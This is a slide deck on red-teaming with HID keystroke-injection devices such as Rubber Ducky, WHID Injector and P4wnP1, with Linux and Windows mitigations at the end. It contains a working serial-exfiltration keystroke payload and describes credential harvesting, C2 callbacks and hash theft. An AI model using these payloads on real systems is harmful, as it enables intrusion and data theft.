SlideShare a Scribd company logo

Redteaming HID attacks

Download as PPTX, PDF
J
Juan Espin

This document discusses various generations of HID attack devices that can inject keystrokes and payloads without detection from antivirus or DLP tools. It covers 1st gen devices like Teensy and Rubber Ducky, 2nd gen techniques like BadUSB, and advanced 3rd gen tools like WHID Injector and P4wnP1 that add WiFi capabilities and ways to bypass airgapping. It also discusses mitigation techniques for Linux and Windows like usbguard and duckhunt as well as resources for further information.

Technology
1 of 25
Download to read offline
1
2
3
4
Most read
5
6
7
8
Most read
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Red teaming HID Attacks
Human Interface Device “A human interface device or HID is a type of computer device usually used by humans and takes input and gives output to humans.” – Wikipedia • Keyboard, Mouse, Game Controllers, Drawing tablets, etc. • Most of the times don’t need external drivers to operate • Usually whitelisted by DLP tools • Not under Antiviruses’ scope
1st Gen. • Teensy – (PHUKD 2009 & Kautilya 2011) – DIY Solution – Multiplatform (Win, *nix, OSX) – Multipayload (through DIP-Switches) – Cheaper (25 €) • Rubberducky (2010) – Dedicated Hardware – Multiplatform (Win, *nix, OSX) – Can emulate Keyboard & USB Disk – Multipayload (CAPS-INS-NUM) – Changeable VID/PID – Expensive (55 €)
2nd Gen. • BadUSB (2014) – It exploits the controllers (i.e. Phison) within commercial USB devices and turns them into a covert keystrokes injecting device. • TURNIPSCHOOL (2015) – Is a hardware implant concealed in a USB cable. It provides short range RF communication capability to software running on the host computer. Alternatively it could serve as a custom USB device under radio control.
3rd Gen. • WHID Injector (2017) – A Rubberducky on Steroids – Dedicated Hardware – Multiplatform (Win, *nix, OSX) – Changeable VID/PID – Has WiFi – Cheap (11 €) • P4wnP1 (2017) – A BashBunny on Steroids – Based on RPi Zero W (~15 €) – Has WiFi and USB to ETH – It can emulate USB Key FileSystem – Autocall Back to C2 – Changeable VID/PID – And many other cool features!
WHID Injector • Atmega 32u4 – Arduino-friendly • ESP-12 – WiFi (both AP and Client modes) – TCP/IP Stack – DNS Support – 4MB Flash • Pinout for weaponizing USB gadgets • HALL Sensor for easy unbrick
Weaponizing USB Gadgets
WHID Injector – WHID GUI (web interface) • Shipped w/ Cactus WHID • Hidden SSID • ESPortal Credentials Harvester • Multi OS (Win, OSX, *nix) • AutoStart Function • Change settings on-the-fly • Live Payloads • Duckyscript to WHID Converter • OTA Update of ESP firmware • Changeable VID/PID • Reset ESP from Serial • AirGrap Bypass through Serial
WHID Injector – WHID GUI (Android app) • Multi OS • AutoStart Function & Live Payloads • Change settings on-the-fly (Hidden SSID, Update FW, Changeable VID/PID)
Spoofing VID & PID Edit boards.txt in Arduino configuration directory • Linux: /root/.arduino15/packages/arduino/hardware/avr/1.6.19/ • Windows: C:Program Files (x86)Arduinohardwarearduinoavr
AirGap Bypass - Windows Serial Exfiltration (Driverless)
AirGap Bypass - Linux Serial Exfiltration CustomDelay:3000 DefaultDelay:50 Press:134+195 CustomDelay:1000 PrintLine:gnome-terminal CustomDelay:1000 PrintLine:sleep .5;stty -F /dev/serial/by-id/*LilyPad* 38400;echo – e "SerialEXFIL:"$(ifconfig)"n" > /dev/serial/by-id/*LilyPad*;exit
ESPortal Credentials Harvester • Redirects HTTP requests to a fake login page. – Does not support HTTPS requests nor override cached HTTPS redirects. • You can define a custom template for up to 3 specific domains, a welcome portal, and a catch-all. • Captured credentials are stored on the exfiltration page in the file "esportal- log.txt". • Custom html templates can be uploaded for the ESPortal login credential harvester via FTP.
Software Frameworks – USaBuse • Bypass Air-Gapped restrictions • Once connected to a PC: – Creates a WiFi AP – Stealthy Screensaver Killer – Injects PoSH scripts that creates a HID RAW as exfil channel to transfer data back. – Returns a CMD shell to the attacker
P4wnP1 • Bypass Air-Gapped restrictions – Uses a HID RAW as exfil channel to transfer data back (~50Kb/s) – The HID backdoor can call back a remote C&C (in case of a weaponized gadget & a known WiFi network available) • Supports RubberDucky Scripts – Can also be triggered by CAPS-, NUM- or SCROLL-LOCK interaction on target • Win10 Lockpicker – Steals NetNTLMv2 hash from locked Windows machine, attempts to crack the hash and enters the plain password to unlock the machine on success. (Fixed with KB4041691 on October 10, 2017).
POTÆbox Penetration Over The {Air, Ethernet} box • Quad-core CPU ARM • 2gb RAM • 8gb NAND • 2x Gigabit Ethernet Ports (for MiTM, NAC Bypass, etc.) • 2x USB 2.0 Ports • Embedded Microphone • Embedded Camera (at least, connector for it) • 2G/3G Module (w/ SIM card slot) • uSD card slot • Atheros Wifi Chipset ( 2x space permi=ng) • Relays controlled by GPIOs (to remotely control lights, TV, etc.) • HDMI in & out (for HDMI MiTM) – WIP POTAEbox Purposes: - Security OperaMons (i.e. PenetraMon Tests) - Surveillance (i.e. Mic & Camera) - Network Appliance (i.e. Firewall, IDS, Honeypot) - Home AutomaMon (i.e. Lights) - Generic Electronic Projects
Redteaming HID attacks
P4wnP1 Mods P4wnP1 OLED Bonnet mod P4wnP1 ophcrack payloadPoisonTap by Sammy Kamkar
More Mods
Pentest Dropboxes
Mitigations – Linux Use udev rules to temporarily disable the addition of new HID devices by creating a file: /etc/udev/rules.d/10-usbblock.rules with the content: #ACTION=="add", ATTR{bInterfaceClass}=="03" RUN+="/bin/sh -c 'echo 0 >/sys$DEVPATH/../authorized'" Run to Block: sed -i 's/#//' /etc/udev/rules.d/10-usbblock.rules; udevadm control -- reload-rules Run to Unlock Before Reboot: sed -i ‘s/^/#/' /etc/udev/rules.d/10-usbblock.rules; udevadm control -- reload-rules
Mitigations – Linux Tools • https://github.com/trpt/usbdeath – Anti-forensic tool that writes udev rules for known usb devices and do some things at unknown usb insertion or specific usb device removal • https://github.com/USBGuard/usbguard – Software framework for implementing USB device authorization policies
Mitigations – Windows Tools • https://github.com/pmsosa/duckhunt – Four Operational Modes: • Paranoid: KB input is disallowed until a password is input. Attack will also be logged. • Normal: KB input will temporarily be disallowed. Attack will also be logged. • Sneaky: A few keys will be dropped. Attack will also be logged. • LogOnly: Simply log the attack. • https://github.com/JLospinoso/beamgun – When a malicious HID is inserted it blocks keystrokes injection by continuously stealing focus (and eventually locking the workstation)
Resources • http://whid.ninja • https://medium.com/@LucaBongiorni/ • https://github.com/exploitagency/ESPloitV2 • https://github.com/sensepost/USaBUSe • https://github.com/mame82/P4wnP1 • http://p4wnp1.readthedocs.io/en/latest/ • https://github.com/mossmann/cc11xx/tree/master/turnipschool • https://srlabs.de/bites/usb-peripherals-turn/ • https://hakshop.com/products/usb-rubber-ducky-deluxe • https://nsa.gov1.info/dni/nsa-ant-catalog/usb/index.html
Fin

More Related Content

PPTX
DDoS ATTACKS
Anil Antony
 
PPT
DDoS Attacks
Jignesh Patel
 
PPTX
Firewall
Saurabh Chauhan
 
PPTX
Modern Network Security Issue and Challenge
Ikhtiar Khan Sohan
 
PDF
Ceh v5 module 19 evading ids firewall and honeypot
Vi Tính Hoàng Nam
 
PPTX
Network security
Nkosinathi Lungu
 
PPTX
Web Hacking With Burp Suite 101
Zack Meyers
 
PPTX
WLAN Attacks and Protection
Chandrak Trivedi
 
DDoS ATTACKS
Anil Antony
 
DDoS Attacks
Jignesh Patel
 
Firewall
Saurabh Chauhan
 
Modern Network Security Issue and Challenge
Ikhtiar Khan Sohan
 
Ceh v5 module 19 evading ids firewall and honeypot
Vi Tính Hoàng Nam
 
Network security
Nkosinathi Lungu
 
Web Hacking With Burp Suite 101
Zack Meyers
 
WLAN Attacks and Protection
Chandrak Trivedi
 

What's hot (20)

PPTX
Cyber threats landscape and defense
fantaghost
 
PPTX
Jhon the ripper
Merve Karabudağ
 
PPTX
Hardware security
RajKumar4943
 
PPTX
CYBER SECURITY
Mohammad Shakirul islam
 
ODP
C I D R
colmbennett
 
PPTX
Network security
Nandini Raj
 
PDF
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
Abhinav Mishra
 
PPTX
CyberSecurity
divyanshigarg4
 
PPTX
OWASP Top 10 Proactive Controls
Katy Anton
 
PPTX
Sql injection
Sasha-Leigh Garret
 
PPTX
Intrusion detection and prevention system
Nikhil Raj
 
PPTX
Intrusion Detection System(IDS)
shraddha_b
 
PPT
Arp spoofing
Luthfi Widyanto
 
PPTX
Security in IoT
gr9293
 
PPTX
Denial of service
garishma bhatia
 
PPTX
Network Security
Manoj Singh
 
PPT
Networkingconcepts
vasanthimuniasamy
 
DOCX
Ports and protocols
Kailash Kumar
 
PPTX
Firewall
Muhammad Sohaib Afzaal
 
PPTX
Cyber Security Awareness Session for Executives and Non-IT professionals
Krishna Srikanth Manda
 
Cyber threats landscape and defense
fantaghost
 
Jhon the ripper
Merve Karabudağ
 
Hardware security
RajKumar4943
 
CYBER SECURITY
Mohammad Shakirul islam
 
C I D R
colmbennett
 
Network security
Nandini Raj
 
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
Abhinav Mishra
 
CyberSecurity
divyanshigarg4
 
OWASP Top 10 Proactive Controls
Katy Anton
 
Sql injection
Sasha-Leigh Garret
 
Intrusion detection and prevention system
Nikhil Raj
 
Intrusion Detection System(IDS)
shraddha_b
 
Arp spoofing
Luthfi Widyanto
 
Security in IoT
gr9293
 
Denial of service
garishma bhatia
 
Network Security
Manoj Singh
 
Networkingconcepts
vasanthimuniasamy
 
Ports and protocols
Kailash Kumar
 
Firewall
Muhammad Sohaib Afzaal
 
Cyber Security Awareness Session for Executives and Non-IT professionals
Krishna Srikanth Manda
 
Ad

Similar to Redteaming HID attacks (20)

PDF
How to bring HID attacks to next level with WHID Injector & P4wnP1
Luca Bongiorni
 
PDF
ANP catalog: the adversarial ninja playset
Luca Bongiorni
 
PPSX
2018 all lens bag of tricks v1.2
Len Noe
 
PPT
Vectors
Yashin Mehaboobe
 
PDF
Talk - Ataques via USB
Anderson Vieira
 
PDF
Building Trojan Hardware at Home
E Hacking
 
PDF
Microcontroller mayhem - ECTF & USSS 2011
warezjoe
 
PDF
Алексей Мисник - USB устройства для пентеста
HackIT Ukraine
 
PDF
BadUSB — On accessories that turn evil by Karsten Nohl
Priyanka Aash
 
PDF
2005 07-hidusb
cam11505
 
PPTX
Hacking the future with USB HID
Nikhil Mittal
 
PDF
Hardware hacking
Tavish Naruka
 
PPTX
Teensy Preso
Wardell Motley, NSA IAM\IEM
 
PPTX
Security Risk Advisors - BSides NOLA 2017 - Your New Red Team Hardware Surviv...
Douglas Webster
 
PDF
2.2. Introduction to Arduino
defconmoscow
 
PDF
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Sergey Gordeychik
 
PPTX
Creating Havoc using Human Interface Device
Positive Hack Days
 
PDF
side-channel-kevin2600
Kevin2600
 
PDF
BadUSB, and what you should do about it
robertfisk
 
PDF
The CARzyPire - Another Red Team Operation
Prathan Phongthiproek
 
How to bring HID attacks to next level with WHID Injector & P4wnP1
Luca Bongiorni
 
ANP catalog: the adversarial ninja playset
Luca Bongiorni
 
2018 all lens bag of tricks v1.2
Len Noe
 
Vectors
Yashin Mehaboobe
 
Talk - Ataques via USB
Anderson Vieira
 
Building Trojan Hardware at Home
E Hacking
 
Microcontroller mayhem - ECTF & USSS 2011
warezjoe
 
Алексей Мисник - USB устройства для пентеста
HackIT Ukraine
 
BadUSB — On accessories that turn evil by Karsten Nohl
Priyanka Aash
 
2005 07-hidusb
cam11505
 
Hacking the future with USB HID
Nikhil Mittal
 
Hardware hacking
Tavish Naruka
 
Teensy Preso
Wardell Motley, NSA IAM\IEM
 
Security Risk Advisors - BSides NOLA 2017 - Your New Red Team Hardware Surviv...
Douglas Webster
 
2.2. Introduction to Arduino
defconmoscow
 
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Sergey Gordeychik
 
Creating Havoc using Human Interface Device
Positive Hack Days
 
side-channel-kevin2600
Kevin2600
 
BadUSB, and what you should do about it
robertfisk
 
The CARzyPire - Another Red Team Operation
Prathan Phongthiproek
 
Ad

Recently uploaded (20)

PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PPTX
MYSQL Presentation for SQL database connectivity
Swati270511
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
PDF
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
PPTX
Machine Learning_overview_presentation.pptx
kondavamsidharreddy2
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PDF
Getting Started with Data Integration: FME Form 101
Safe Software
 
PDF
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PPTX
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
PPTX
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
MYSQL Presentation for SQL database connectivity
Swati270511
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
Machine Learning_overview_presentation.pptx
kondavamsidharreddy2
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Getting Started with Data Integration: FME Form 101
Safe Software
 
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
A Presentation on Artificial Intelligence
memembruh336
 
Encapsulation theory and applications.pdf
gurumoop
 
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 

Redteaming HID attacks

  • 2. Human Interface Device “A human interface device or HID is a type of computer device usually used by humans and takes input and gives output to humans.” – Wikipedia • Keyboard, Mouse, Game Controllers, Drawing tablets, etc. • Most of the times don’t need external drivers to operate • Usually whitelisted by DLP tools • Not under Antiviruses’ scope
  • 3. 1st Gen. • Teensy – (PHUKD 2009 & Kautilya 2011) – DIY Solution – Multiplatform (Win, *nix, OSX) – Multipayload (through DIP-Switches) – Cheaper (25 €) • Rubberducky (2010) – Dedicated Hardware – Multiplatform (Win, *nix, OSX) – Can emulate Keyboard & USB Disk – Multipayload (CAPS-INS-NUM) – Changeable VID/PID – Expensive (55 €)
  • 4. 2nd Gen. • BadUSB (2014) – It exploits the controllers (i.e. Phison) within commercial USB devices and turns them into a covert keystrokes injecting device. • TURNIPSCHOOL (2015) – Is a hardware implant concealed in a USB cable. It provides short range RF communication capability to software running on the host computer. Alternatively it could serve as a custom USB device under radio control.
  • 5. 3rd Gen. • WHID Injector (2017) – A Rubberducky on Steroids – Dedicated Hardware – Multiplatform (Win, *nix, OSX) – Changeable VID/PID – Has WiFi – Cheap (11 €) • P4wnP1 (2017) – A BashBunny on Steroids – Based on RPi Zero W (~15 €) – Has WiFi and USB to ETH – It can emulate USB Key FileSystem – Autocall Back to C2 – Changeable VID/PID – And many other cool features!
  • 6. WHID Injector • Atmega 32u4 – Arduino-friendly • ESP-12 – WiFi (both AP and Client modes) – TCP/IP Stack – DNS Support – 4MB Flash • Pinout for weaponizing USB gadgets • HALL Sensor for easy unbrick
  • 8. WHID Injector – WHID GUI (web interface) • Shipped w/ Cactus WHID • Hidden SSID • ESPortal Credentials Harvester • Multi OS (Win, OSX, *nix) • AutoStart Function • Change settings on-the-fly • Live Payloads • Duckyscript to WHID Converter • OTA Update of ESP firmware • Changeable VID/PID • Reset ESP from Serial • AirGrap Bypass through Serial
  • 9. WHID Injector – WHID GUI (Android app) • Multi OS • AutoStart Function & Live Payloads • Change settings on-the-fly (Hidden SSID, Update FW, Changeable VID/PID)
  • 10. Spoofing VID & PID Edit boards.txt in Arduino configuration directory • Linux: /root/.arduino15/packages/arduino/hardware/avr/1.6.19/ • Windows: C:Program Files (x86)Arduinohardwarearduinoavr
  • 11. AirGap Bypass - Windows Serial Exfiltration (Driverless)
  • 12. AirGap Bypass - Linux Serial Exfiltration CustomDelay:3000 DefaultDelay:50 Press:134+195 CustomDelay:1000 PrintLine:gnome-terminal CustomDelay:1000 PrintLine:sleep .5;stty -F /dev/serial/by-id/*LilyPad* 38400;echo – e "SerialEXFIL:"$(ifconfig)"n" > /dev/serial/by-id/*LilyPad*;exit
  • 13. ESPortal Credentials Harvester • Redirects HTTP requests to a fake login page. – Does not support HTTPS requests nor override cached HTTPS redirects. • You can define a custom template for up to 3 specific domains, a welcome portal, and a catch-all. • Captured credentials are stored on the exfiltration page in the file "esportal- log.txt". • Custom html templates can be uploaded for the ESPortal login credential harvester via FTP.
  • 14. Software Frameworks – USaBuse • Bypass Air-Gapped restrictions • Once connected to a PC: – Creates a WiFi AP – Stealthy Screensaver Killer – Injects PoSH scripts that creates a HID RAW as exfil channel to transfer data back. – Returns a CMD shell to the attacker
  • 15. P4wnP1 • Bypass Air-Gapped restrictions – Uses a HID RAW as exfil channel to transfer data back (~50Kb/s) – The HID backdoor can call back a remote C&C (in case of a weaponized gadget & a known WiFi network available) • Supports RubberDucky Scripts – Can also be triggered by CAPS-, NUM- or SCROLL-LOCK interaction on target • Win10 Lockpicker – Steals NetNTLMv2 hash from locked Windows machine, attempts to crack the hash and enters the plain password to unlock the machine on success. (Fixed with KB4041691 on October 10, 2017).
  • 16. POTÆbox Penetration Over The {Air, Ethernet} box • Quad-core CPU ARM • 2gb RAM • 8gb NAND • 2x Gigabit Ethernet Ports (for MiTM, NAC Bypass, etc.) • 2x USB 2.0 Ports • Embedded Microphone • Embedded Camera (at least, connector for it) • 2G/3G Module (w/ SIM card slot) • uSD card slot • Atheros Wifi Chipset ( 2x space permi=ng) • Relays controlled by GPIOs (to remotely control lights, TV, etc.) • HDMI in & out (for HDMI MiTM) – WIP POTAEbox Purposes: - Security OperaMons (i.e. PenetraMon Tests) - Surveillance (i.e. Mic & Camera) - Network Appliance (i.e. Firewall, IDS, Honeypot) - Home AutomaMon (i.e. Lights) - Generic Electronic Projects
  • 18. P4wnP1 Mods P4wnP1 OLED Bonnet mod P4wnP1 ophcrack payloadPoisonTap by Sammy Kamkar
  • 21. Mitigations – Linux Use udev rules to temporarily disable the addition of new HID devices by creating a file: /etc/udev/rules.d/10-usbblock.rules with the content: #ACTION=="add", ATTR{bInterfaceClass}=="03" RUN+="/bin/sh -c 'echo 0 >/sys$DEVPATH/../authorized'" Run to Block: sed -i 's/#//' /etc/udev/rules.d/10-usbblock.rules; udevadm control -- reload-rules Run to Unlock Before Reboot: sed -i ‘s/^/#/' /etc/udev/rules.d/10-usbblock.rules; udevadm control -- reload-rules
  • 22. Mitigations – Linux Tools • https://github.com/trpt/usbdeath – Anti-forensic tool that writes udev rules for known usb devices and do some things at unknown usb insertion or specific usb device removal • https://github.com/USBGuard/usbguard – Software framework for implementing USB device authorization policies
  • 23. Mitigations – Windows Tools • https://github.com/pmsosa/duckhunt – Four Operational Modes: • Paranoid: KB input is disallowed until a password is input. Attack will also be logged. • Normal: KB input will temporarily be disallowed. Attack will also be logged. • Sneaky: A few keys will be dropped. Attack will also be logged. • LogOnly: Simply log the attack. • https://github.com/JLospinoso/beamgun – When a malicious HID is inserted it blocks keystrokes injection by continuously stealing focus (and eventually locking the workstation)
  • 24. Resources • http://whid.ninja • https://medium.com/@LucaBongiorni/ • https://github.com/exploitagency/ESPloitV2 • https://github.com/sensepost/USaBUSe • https://github.com/mame82/P4wnP1 • http://p4wnp1.readthedocs.io/en/latest/ • https://github.com/mossmann/cc11xx/tree/master/turnipschool • https://srlabs.de/bites/usb-peripherals-turn/ • https://hakshop.com/products/usb-rubber-ducky-deluxe • https://nsa.gov1.info/dni/nsa-ant-catalog/usb/index.html
  • 25. Fin